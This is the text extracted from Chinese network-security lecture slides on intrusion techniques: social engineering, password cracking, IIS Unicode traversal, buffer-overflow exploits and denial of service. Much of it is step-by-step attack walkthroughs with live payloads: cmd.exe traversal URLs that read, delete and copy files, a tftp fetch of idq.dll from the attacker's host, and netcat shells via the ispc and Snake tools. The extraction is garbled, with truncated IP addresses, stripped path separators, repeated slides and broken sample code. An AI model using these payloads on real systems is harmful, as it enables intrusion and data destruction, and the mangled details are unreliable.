计算机网络安全教程.ppt

1、计算机网络安全教程,第五章 网络入侵,5.1,物理攻击与防范,5.2,暴力攻击,5.3,Unicode漏洞专题,5.4,社会工程学攻击,5,5.5,缓冲区溢出攻击,5.6,拒绝服务攻击,5.7,分布式拒绝服务攻击,5.8,其他漏洞攻击,防范拒绝服务攻击,5.9,社会工程学攻击,5.1,社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。,社会工程学攻击,举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信

2、息，例如所有秘书和行政人员和他们的配偶、孩子的名字，这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。,网络攻击技术社交工程,黑客们最常用的一种攻击手段 能得到使用技术手段不能得到的好处 防火墙和IDS对这种攻击不起作用 需要高超的人际交往技术 常用方式 电话 电子商务,网络攻击技术社交工程,社交工程种类 假冒权威 假扮 同情 个人利益 改善自我感觉 不引人注意的职业 奖赏,社交工程（Social Engineering）,假冒权威 黑客冒充公司的领导人员 在大公司中，不认识所有上司的

3、情况非常普通 在Internet上，黑客可以通过邮件列表发出入侵的安全警告，并提供解决问题的指令，指令被设计成能使黑客访问系统。足够显眼的标题和时髦的行话,社交工程（Social Engineering）,假扮 电话、电子邮件、聊天室和短消息里假扮你的熟人 如果你是新来的职员，冒充你的同事 同情 如果一个人打电话来，讲述他的困难，你不帮助他吗？ 个人利益 假冒来自财务部门的员工，访问系统管理员,社交工程（续）,改善自我感觉 自我感觉良好的人易于被欺骗 黑客进入热情的经理房间，表明自己是来自市场部的新员工，会得到详细的介绍,社交工程（续）,不引人注意的职业 来自天然气、电力公司或者电话公司的员工

4、 请求拨号等上机操作 人们会单独把黑客放在房间里 奖赏 提供某种形式的奖赏会引诱人泄露信息 口令比赛赢大奖、展示创造性，请列出密码,避免受到社交工程攻击,极度警惕 Do not trust any stranger 即使是很友好的人 怀疑一切 声称并不代表他有权这样做 询问他们的权限 绝大多数社交工程在高度警惕下破产,避免受到社交工程攻击（续）,验证出处 当某人电子邮件要求时，要求来电话确证 对于电话里的请求，要求回电号码并确证 员工号码或者身份证,避免受到社交工程攻击（续）,说不 对于逾越日常行为准则的要求，要拒绝 要求按照正常程序和规定 书面报告和授权信息 用户培训 培训员工，提高安全意识

5、,物理攻击与防范,5.2,获取管理员密码,1,权限提升,2,物理安全是保护一些比较重要的设备不被接触。 物理安全比较难防，因为攻击往往来自能够接触到物理设备的用户。,引 言,获取管理员密码,1,用户登录以后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”， Windows Logon Process，Windows NT 用户登陆程序，管理用户登录和退出。该进程的正常路径应是 C:WindowsSystem32 且是以 SYSTEM 用户运行,获取管理员密码,1,案例5-1得到管理员密码 用户登录以后，所有的用户信息都存储在系统的一个进程中，这个进程是：“wi

6、nlogon.exe”，可以利用程序将当前登录用户的密码解码出来，如图5-1所示。,获取管理员密码,1,使用FindPass等工具可以对该进程进行解码，然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录，执行该程序，将得到当前用户得登录名，如图5-2所示。,权限提升,2,有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。常用的方法： 社会工程学 本地溢出 利用scripts目录的可执行权限 替换系统服务 替换admin常用程序 利用autorun .inf Serv-U提升权限 SQL帐户密码泄露,权限提升,2,用普通用户帐号登录后，可以利用工具G

7、etAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。,案例5-2 普通用户建立管理员帐号,利用Hacker帐户登录系统，在系统中执行程序GetAdmin.exe，程序自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名，如图5-5所示。,案例5-2 普通用户建立管理员帐号,输入一个用户名“IAMHacker”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口，如图5-6所示。,暴力攻击,5.3,字典文件,1,暴力破解操作系统密码,2,暴力破解邮箱密码,3,暴力破解软件密码,4,暴力攻击是一种发现密码的尝试，其方法是系

8、统地尝试字母、数字和符号的每种可能组合，直到发现一个可起作用的正确组合。攻击者总可以通过暴力攻击获得密码，但这种方法的不利之处在于，可能需要数年才能找到一个密码。根据密码的长度和复杂性，也许有无数个可能的组合。 针对一个安全系统进行暴力攻击需要大量的时间，需要极大的意志和决心。,什么是暴力攻击,暴力攻击,暴力攻击的一个具体例子是，一个黑客试图使用计算机和信息去破解一个密码。 一个黑客需要破解段单一的被用非对称密钥加密的信息，为了破解这种算法，一个黑客需要求助于非常精密复杂的方法，它使用120个工作站，两个超级计算机利用从三个主要的研究中心获得的信息，即使拥有这种配备，它也将花掉八天的时间去破解

9、加密算法，实际上破解加密过程八天已是非常短暂的时间了。,暴力破解,两种方式的破解 在线破解 在线登录目标主机，通过程序循环输入密码尝试正确的密码输入 可能会在日志里留下记录，很容易被探测出来 离线破解 取得目标主机的密码文件，然后在本地破解 花费时间较长，一般时攻击系统取得一定权限后使用,在线破解,Windows系统 使用NAT(NetBIOS Auditing Tool)进行探测 在NetBIOS开放138，139端口提供SMB服务，允许用户远程访问文件系统 Windows2000缺省共享所有驱动器和admin$ 访问文件系统时需要用户身份验证 NAT可以猜测用户口令，从而取得目标机器的控制

10、权 NAT用法：nat -o filename -u userlist -p passlist address,在线破解,Linux系统 一般在telnet三次错误后，系统会断开连接 在线破解的软件较少,离线破解,得到用户的密码文件，然后在本地破解 Windows系统 用户密码存放在%systemroot%system32config和%systemroot%repair中 得到这个文件后可以使用L0phtcrack进行本地破解,离线破解,Linux系统 用户名和密码存储在/etc/passwd中 会被很多用户看到该文件 为了加强安全性，将密码存储在etc/shadow中 只能由root存取

11、著名的破解工具：John the Ripper 因为Linux在线破解困难，所以离线破解比较常见 很多管理员现在没有使用shadow文件,暴力破解手段,暴力破解的手段 字典攻击 强行攻击 组合攻击,字典攻击,字典：一些单词或者字母和数字的组合 使用字典的好处 比较快速的得到用户密码，只需要在字典中进行查找,字典攻击前提,前提条件 绝大多数用户选择密码总是有一定规律的 姓名：自己、父母、爱人、孩子 生日 电话号码，身份证号码，学号 英文单词 上述组合 打开钱包，我就能知道你的密码 设计一个好的字典是非常有必要的,字典攻击防御,防止字典攻击的方法 使用带有特殊字符的密码 密码不是有规律的英语单词,

12、强行攻击,在选定的字母或者数字序列里生成所有包含这些字母的口令 密码生成器，只要用户指定字母和数字和密码的位数，就能生成字典 特点 密码较多，所需时间较长 分布式攻击 多台计算机共同运算 适用于对用户信息不够了解的情况,强行攻击防御,对策 使用长的密码 攻击者需要构造出很大的字典，加大攻击难度 经常更换密码 需要在方便和安全中作出抉择,组合攻击,综合前两种攻击的优点 字典攻击：速度较快 强行攻击：发现所有的口令 根据掌握的用户的不同信息，进行口令组合 姓名缩写和生日的组合 在字母组合后面加上一些数字,三种攻击的比较,字典文件,1,一次字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件

13、可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机，可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分，公司以及部门的简称一般也可以作为字典文件的一部分，这样可以大大的提高破解效率。,字典文件,1,一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件，图5-8是一个简单的字典文件。,暴力破解操作系统密码,2,字典文件为暴力破解提供了一条捷径，程序首先通过扫描得到系统的用户，然后利用字典中每一个密码来登录系统，看是否成功，如果成功则将密码显示,暴力破解操作系统密码,2,案例5-3 暴力破解操作系统密码 比如使用图

14、5-8所示的字典文件，利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来，如图5-9所示。,暴力破解邮箱密码,3,邮箱的密码一般需要设置到八位以上，否则七位以下的密码容易被破解。 尤其七位全部是数字，更容易被破解。 案例5-4 电子邮箱暴力破解 破解电子邮箱密码，一个比较著名的工具软件是：黑雨POP3邮箱密码暴力破解器，比较稳定的版本是2.3.1，主界面如图5-10所示。,暴力破解软件密码,4,目前许多软件都具有加密的功能，比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话，同样容易被破解

15、。 案例5-5 Office文档暴力破解,修改权限密码,在对话框中选择选项卡“安全性”，在打开权限密码和修改权限密码的两个文本框中都输入“999”，如图5-12所示。,输入密码,保存并关闭该文档，然后再打开，就需要输入密码了，如图5-13所示。,破解Word文档密码,该密码是三位的，使用工具软件，Advanced Office XP Password Recovery可以快速破解Word文档密码，主界面如图5-14所示。,破解Word文档密码,点击工具栏按钮“Open File”，打开刚才建立的Word文档，程序打开成功后会在Log Window中显示成功打开的消息，如图5-15所示。,破解W

16、ord文档密码,设置密码长度最短是一位，最长是三位，点击工具栏开始的图标，开始破解密码，大约两秒钟后，密码被破解了，如图5-16所示。,Unicode漏洞专题,5.4,Unicode漏洞的检测方法,1,使用Unicode漏洞删除主页,2,引言,通过打操作系统的补丁程序，就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。 Unicode漏洞是2000-10-17发布的，受影响的版本： Microsoft IIS 5.0+Microsoft Windows 2000系列版本 Microsoft IIS 4.0+ Microsoft Windows NT 4.0 消除该

17、漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代/和而能利用./目录遍历的漏洞。,Unicode漏洞,Unicode漏洞是2000-10-17发布的，受影响的版本： Microsoft IIS 5.0+Microsoft Windows 2000系列版本 Microsoft IIS 4.0+ Microsoft Windows NT 4.0 消除该漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代/和而能利用./目录遍历的漏洞

18、。,Unicode漏洞的检测方法,1,使用扫描工具来检测Unicode漏洞是否存在，使用上一章介绍的X-Scan来对目标系统进行扫描，目标主机IP为：09，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置如图5-17所示。,Unicode漏洞的检测方法,1,将主机添加到目标地址，扫描结果如图5-18所示。,Unicode漏洞的检测方法,1,可以看出，存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如： /scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir 其中/sc

19、ripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录，在IIS中的位置如图5-19所示。,Unicode漏洞的检测方法,1,scripts目录一般系统盘根目录下的Inetpub目录下，如图5-20所示。,Unicode漏洞的检测方法,1,在Windows的目录结构中，可以使用两个点和一个斜线“./”来访问上一级目录，在浏览器中利用“scripts/././”可以访问到系统盘根目录，访问“scripts/././winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。

20、,Unicode漏洞的检测方法,1,浏览器地址栏中禁用符号“./”，但是可以使用符号“/”的Unicode的编码。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。,Unicode漏洞,此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。,Unicode漏洞

21、,但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、韩文版等操作系统。 %c1%pc %c0%9v %c0%qf %c1%8s %e0%80%af,Unicode漏洞,利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入 “09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”,利用Unicode漏洞读取系统盘目录,利用Unicode漏洞读取系统盘目录,利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就

22、可以了。使用的语句是： 09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini 执行的结果如图5-22所示。,使用Unicode漏洞删除主,2,利用Unicode可以方便的更改对方的主页，比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。 使用的语句是： 09/scripts/.%c0%2f./winnt/

23、system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp,使用Unicode漏洞删除主,2,拷贝文件,为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是： 09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe 程序执行结果如图5-24所示。,查看C盘的目录,以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为： http:/172.1

24、8.25.109/scripts/c.exe?/c+dir+c: 执行的结果如图5-25所示。,利用Unicode漏洞入侵系统,在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件。 入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。,利用Unicode漏洞入侵系统,需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（Text File Transmission Protocol）一般用来传

25、输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序，主界面如图5-26所示。,利用Unicode漏洞入侵系统,这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令： “09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”， 命令其实是“tftp i 10 get idq.d

26、ll”意思是从10服务器上获取idq.dll文件，执行成功的界面如图5-27所示。,上载文件,查看scripts目录,上传完毕后可以查看一下scripts目录，是否真的上传成功了。如图5-28所示。,入侵对方主机,说明已经成功的在scripts目录中上传了一个idq.dll文件， 第二步：下面使用工具软件ispc.exe入侵对方系统 拷贝ispc.exe文件到本地计算机的C盘根目录，在DOS命令行下执行命令： “ispc.exe 09/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限，入侵的过程5-29

27、所示。,建立用户,可以在对方计算机上做管理员可以做的一切事情，比如添加用户，建立一个用户名为“Hacker123”，密码也是“Hacker123”的用户，如图5-30所示。,其他漏洞攻击,5.5,利用打印漏洞,1,SMB致命攻击,2,利用打印漏洞,利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。经过测试，该漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保证100%入侵成功。 使用工具软件：cniis.exe，使用的语法格式是：“cniis 09 0”，第一个参数是目标的IP地址，第二参数是目标操作系统的补丁号，因为09没有打补丁

28、，这里就是0。拷贝cniis.exe文件到C盘根目录，执行程序如图5-31所示。,1,SMB致命攻击,SMB（Session Message Block，会话消息块协议）又叫做NetBIOS或LanManager协议，用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。 SMB协议版本有很多种，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.12版本。,2,SMB致命攻击,利用该协议可以进行各方面的攻击，比如可以抓取其他用户访问自己计算机共享目录的SMB会话包，然后利用SMB会话包登录对方的计算机。

29、下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。,2,致命攻击,使用的工具软件是：SMBDie V1.0，该软件对打了SP3、SP4的计算机依然有效，必须打专门的SMB补丁，软件的主界面如图5-32所示。,致命攻击,攻击的时候，需要两个参数：对方的IP地址和对方的机器名，窗口中分别输入这两项，如图5-33所示。,致命攻击,然后再点按钮“Kill”，如果参数输入没有错误的话，对方计算机立刻重启或蓝屏，命中率几乎100%，被攻击的计算机蓝屏界面如图5-34所示。,缓冲区溢出攻击,5.6,RPC漏洞溢出,1,利用IIS溢出进行攻击,2,利用WebDav远程溢出,3,引言,目前最流行的一种攻

30、击技术就是缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信息量的时候，将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出，然后覆盖了实际的程序数据，缓冲区溢出使目标系统的程序被修改，经过这种修改的结果使在系统上产生一个后门。 这项攻击对技术要求比较高，但是攻击的过程却非常简单。缓冲区溢出原理很简单，比如程序：,引言,void function(char * szPara1) char buff16; strcpy(buffer, szPara1); 程序中利用strcpy函数将szPara1中的内容拷贝到buff中，只要szPara1的长度大于16，就会造成缓冲区溢出。存在str

31、cpy函数这样问题的C语言函数还有：strcat()、gets()、scanf()等。,引言,void function(char * szPara1) char buff16; strcpy(buffer, szPara1); 程序中利用strcpy函数将szPara1中的内容拷贝到buff中，只要szPara1的长度大于16，就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有：strcat()、gets()、scanf()等。,缓存区溢出历史,缓存区溢出历史 1988年的Morris蠕虫病毒，成功攻击了6000多台机器：利用UNIX服务finger中的缓冲区溢出漏洞来获得访问

32、权限，得到一个shell 1996年前后，开始出现大量的Buffer Overflow攻击，因此引起人们的广泛关注 源码开放的操作系统首当其冲 随后，Windows系统下的Buffer Overflows也相继被发掘出来 已经有一些非常经典细致的文章来介绍与Buffer overflows有关的技术,缓冲区溢出的基本介绍,基本的思想 通过修改某些内存区域，把一段恶意代码存储到一个buffer中，并且使这个buffer被溢出，以便当前进程被非法利用(执行这段恶意的代码),“SQL Slammer”蠕虫王的发作原理，就是利用未及时更新补丁的MS SQL Server数据库缓冲溢出漏洞。采用不正确的

33、方式将数据发到MS Sql Server的监听端口，这个错误可以引起缓冲溢出攻击。 出现的MSBLAST病毒正是利用了微软关于RPC 接口中远程任意可执行代码漏洞，“中招”的机器会反复重启，或者拷贝、粘贴功能不工作等现象。 仅去年缓冲区溢出就占使 CERT/CC 提出建议的所有重大安全性错误的百分之五十以上。并且数据显示这一问题正在扩大，而不是在缩减。,缓冲区溢出的实例,缓冲区溢出的保护方法,编写正确的代码 最简单的方法就是用grep来搜索源代码中容易产生漏洞的库的调用 为了对付这些问题，人们已经开发了一些高级的查错工具，如faultinjection等。这些工具的目的在于通过人为随机地产生一

34、些缓冲区溢出来寻找代码的安全漏洞。,缓冲区溢出的保护方法,非执行的缓冲区 通过使被攻击程序的数据段地址空间不可执行，从而使得攻击者不可能执行被植入被攻击程序输入缓冲区的代码，这种技术被称为非执行的缓冲区技术。事实上，很多老的Unix系统都是这样设计的，但是近来的Unix和MS Windows系统为实现更好的性能和功能，往往在数据段中动态地放人可执行的代码。所以为了保持程序的兼容性不可能使得所有程序的数据段不可执行。但是我们可以设定堆栈数据段不可执行，这样就可以最大限度地保证了程序的兼容性。,缓冲区溢出的保护方法,数组边界检查 程序指针完整性检查,RPC漏洞溢出,远程过程调用RPC（Remote

35、 Procedure Call)，是操作系统的一种消息传递功能，允许应用程序呼叫网络上的计算机。当系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务，如图5-35所示。,1,利用RPC漏洞建立超级用户,RPC溢出漏洞，对SP4也适用，必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞，该工具是ISS安全公司2003年7月30日发布的，运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞（823980-MS03-026）”补丁程序。 如果没有安装补丁程序，该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录

36、，现在要检查地址段09到10的主机，执行命令“scanms.exe 09-10”，检查过程如图5-36所示。,检查缓冲区溢出漏洞,利用缓冲区溢出漏洞攻击,利用工具软件attack.exe对09进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，并终止了对方的RPC服务。 新建用户的用户名和密码都是qing10，这样就可以登录对方计算机了，RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现，使用工具软件OpenRpcSs.exe来给对方重启RPC服务。攻击的全

37、过程如图5-37所示。,攻击的全过程,IIS溢出原理,IIS缓冲区溢出 IIS：windows系统上最不安全的服务 ISAPI提供对管理脚本(.ida文件)和Inernet数据(.idq)查询的支持 向idq.dll发送一个过量的变量 GET /null.ida? buffer=X HTTP/1.1 Host: 任意值 一些具体的攻击方法没有公开 Code Red蠕虫利用了这一漏洞,2,利用IIS溢出进行攻击,案例5-11 利用IIS溢出入侵系统 利用软件Snake IIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口，工具软件的主界面如图5-38所示。,2,该软

38、件适用于各种类型的操作系统，比如对09进行攻击，09的操作系统的Windows 2000，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行命令“dir c:”设置如图5-39所示。,利用IIS溢出进行攻击,2,点击按钮“IDQ溢出”，出现攻击成功的提示框，如图5-40所示。,2,利用IIS溢出进行攻击,这个时候，813端口已经开放，利用工具软件nc.exe连接到该端口，将会自动执行刚才发送的DOS命令“dir c:”，使用的语法是：nc.exe -vv 09 813，其中-vv是程序的参数，813是目标端口

39、。可以看到命令的执行结果，如图5-41所示。,利用IIS溢出进行攻击,2,监听本地端口,下面利用nc.exe和snake工具的另外一种组合入侵对方计算机。首先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc -l -p 813”，执行的过程如图5-42所示。,这个窗口就这样一直保留，启动工具软件snake，本地的IP地址是10，要攻击的计算机的IP地址是09，选择溢出选项中的第一项，设置IP为本地IP地址，端口是813，如图5-43所示。,监听本地端口,设置好以后，点击按钮“IDQ溢出”，程序显示对话框如图4-44所示。,监听本地端口

40、,查看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来，如图4-45所示。,监听本地端口,IIS默认提供了对WebDav的支持，通过WebDav可以通过HTTP向用户提供远程文件存储的服务。但是WebDav使用了ntDll.dll函数，这个函数对在长度检查中存在一个整数溢出问题，可以利用此漏洞获取权限。,WebDav远程溢出原理,3,需要使用工具软件nc.exe和webdavx3.exe，首先在DOS命令行下执行webdavx3.exe，如果执行的话，该程序将提示已经过期了，如图4-46所示。,利用WebDav远程溢出,3,攻击,修改本地系统时间到20

41、01年，这样就可以攻击了，在命令后面直接跟对方的IP地址就可以了，现在要攻击的计算机是09，执行情况如图4-47所示。,入侵对方的计算机,该程序不能自动退出，当发现程序长时间没有反映的时候，需要手工按下“CTRL+C”退出程序。该程序在对方的计算机上开了一个端口7788，依然可以nc.exe程序入侵对方的计算机，过程如图4-48所示。,拒绝服务攻击,5.7,SYN风暴,1,Smurf攻击,2,利用处理程序错误进行攻击,3,拒绝服务攻击介绍,拒绝服务攻击的简称是：DoS（Denial of Service）攻击，凡是造成目标计算机拒绝提供服务的攻击都称为DoS攻击，其目的是

42、使目标计算机或网络无法提供正常的服务。 最常见的DoS攻击是：计算机网络带宽攻击和连通性攻击。带宽攻击是以极大的通信量冲击网络，使网络所有可用的带宽都被消耗掉，最后导致合法用户的请求无法通过。连通性攻击指用大量的连接请求冲击计算机，最终导致计算机无法再处理合法用户的请求。,DoS的技术历史,早期的Internet蠕虫病毒 Robert Morris的RTM蠕虫 消耗网络资源 分片装配，非法的TCP标志，SYN Flood，等 利用系统实现上的缺陷，点对点形式 Ping of Death, IP分片重叠 分布式DoS(DDoS)攻击 最著名的smurf攻击,针对不同的系统，攻击的结果可能不同，但

43、是攻击的根本都是利用这些系统中TCP/IP协议族的设计弱点和缺点.只有对现有TCP/IP协议族进行重大改变才能修正这些缺陷。目前还没有一个完整的解决方案，但是可以采取一些措施尽量降低这种攻击发生的可能性，减少损失。,SYN风暴,1,IP协议是Internet网络层的标准协议，提供了不可靠的无连接的网络分组传输服务。IP协议的基本数据传输单元成为网络包。 TCP协议位于IP协议和应用层协议之间，提供了可靠的面向连接数据流传输服务。TCP通过流控制机制和重传等技术来实现可靠的数据报传输。,SYN风暴背景介绍,握手的第一报文段的码元字段的SYN为被置1.第二个报文的SYN和ACK问均被置1，指出这是

44、对第一个SYN报文段的确认并继续握手操作。最后一个握手报文仅仅是一个确认信息，通知目标主机已成功建立了双方所同意的这个连接。,SYN风暴背景介绍,针对每个连接，连接双方都要为该连接分配以下内存资源。 （1）socket结构：描述所使用的协议、状态信息、地址信息、连接队列、缓冲区和其他标志位等。 （2）Internet协议控制块结构：描述TCP状态信息、IP地址、端口号、IP头原型、目标地址及其其他选项等。 （3）TCP控制块结构：描述时钟信息、序列号、流控制信息及带外数据等。,SYN风暴背景介绍,用三次握手建立 TCP 连接的各状态,CLOSED,CLOSED,A,B,客户,服务器,在B返回一

45、个确认的SYN-ACK包的时候有个潜在的弊端，他可能不会接到A回应的ACK包。这个也就是所谓的半开放连接，B需要耗费一定的数量的系统内存来等待这个未决的连接，虽然这个数量是受限的，但是恶意者可以通过创建很多的半开放式连接来发动SYN洪水攻击。,SYN风暴攻击手段,通过ip欺骗可以很容易的实现半开放连接。攻击者发送SYN包给受害者系统，这个看起来是合法的，但事实上所谓的C根本不会回应这个。SYN-ACK报文，这意味着受害者将永远不会接到ACK报文。而此时，半开放连接将最终耗用受害者所有的系统资源，受害者将不能再接收任何其他的请求。,SYN风暴攻击手段,通常等待ACK返回包有超时限制，所以半开放，

46、连接将最终超时，而受害者系统也会自动修复。虽然这样，但是在受害者系统修复之前，攻击者可以很容易的一直发送虚假的SYN请求包来持续攻击。,SYN风暴攻击手段,在大多数情况下，受害者几乎不能接受任何其他的请求，但是这种攻击不会影响到已经存在的进站或者是出站连接。虽然这样，受害者系统还是可能耗尽系统资源，以导致其他种种问题。 攻击系统的位置几乎是不可确认的，因为SYN包中的源地址多数都是虚假的。当SYN包到达受害者系统的时候，没有办法找到他的真实地址。,SYN风暴攻击手段,SYN风暴攻击过程,常用的防范方法包括5个方面： 1、优化系统配置： 缩短超时时间； 增加半连接队列的长度 关闭不重要的服务 2

47、、优化路由器配置： 配置路由器的外网卡 配置路由器的内网卡,分析与对抗,3、完善基础设施 4、使用防火墙： 5、主动监视,分析与对抗,Smurf攻击是以最初发动这种攻击的程序名Smurf来命名的。这种攻击方法结合使用了IP欺骗和带有广播地址的ICMP请求-响应方法使大量网络传输充斥目标系统，引起目标系统拒绝为正常系统进行服务，属于间接、借力攻击方式。 任何连接到互联网上的主机或其他支持ICMP请求-响应的网络设备都可能成为这种攻击的目标。,Smurf攻击,2,原理：攻击者伪造一个ICMP echo请求包，其源地址为目标受害者地址，目的地址为中间脆弱网络的广播地址，并将该echo请求包发送到中间

48、脆弱网络。中间脆弱网络中的主机收到该echo请求包时，会以echo响应包作为回答，而这些包最终被发送到目标受害者。这样大量同时返回的echo响应数据包造成目标网络严重拥塞、丢包，甚至完全不可用等现象。,Smurf攻击手段,Smurf攻击手段,攻击特征 涉及到三方：攻击者，中间目标网络，受害者 以较小的网络带宽资源，通过放大作用，吃掉较大带宽的受害者系统 Smurf放大器 Smurf放大器网络：不仅允许ICMP Echo请求发给网络的广播地址，并且允许ICMP Echo-Reply发送回去 这样的公司越多，对Internet的危害就越大,Smurf攻击手段,实施Smurf攻击 需要长期的准备，首

49、先找到足够多的中间网络 集中向这些中间网络发出ICMP Echo包,Smurf攻击手段,针对最终受害者 没有直接的方法可以阻止自己接收ICMP Echo Reply消息 在路由器上阻止这样的应答消息，但是，结果是，路由器本身遭受了DoS攻击 与中间目标网络联系 针对中间网络 关闭外来的IP广播消息，但是，如果攻击者从内部机器发起攻击，仍然不能阻止smurf攻击 配置操作系统，对于广播地址的ICMP包不响应,Smurf攻击的防止措施,针对发起攻击的主机及其网络： 在路由器上配置其过滤规则，丢弃那些即将发到外部网而源IP地址不具有内部网络地址的包。,Smurf攻击的防止措施,SYN floodin

50、g和Smurf攻击利用TCP/IP协议中的设计弱点，通过强行引入大量的网络包来占用带宽。迫使弥补受害主机拒绝对正常的服务请求进行响应。,利用处理程序错误进行攻击,3,原理：利用TCP/IP协议实现中的处理程序错误进行攻击，即故意错误地设定数据包头的一些重要字段。 将这些错误的IP数据包发送出去。在接收端，服务程序通常都存在一些问题，因而在将接收到的数据包组装成一个完整的数据包的过程中，就会使系统当机、挂起或崩溃，从而无法继续提供服务。,利用处理程序错误进行攻击,3,Ping of Death 发送异常的(长度超过IP包的最大值) Teardrop IP包的分片装配 Land 程序发送一个TCP SY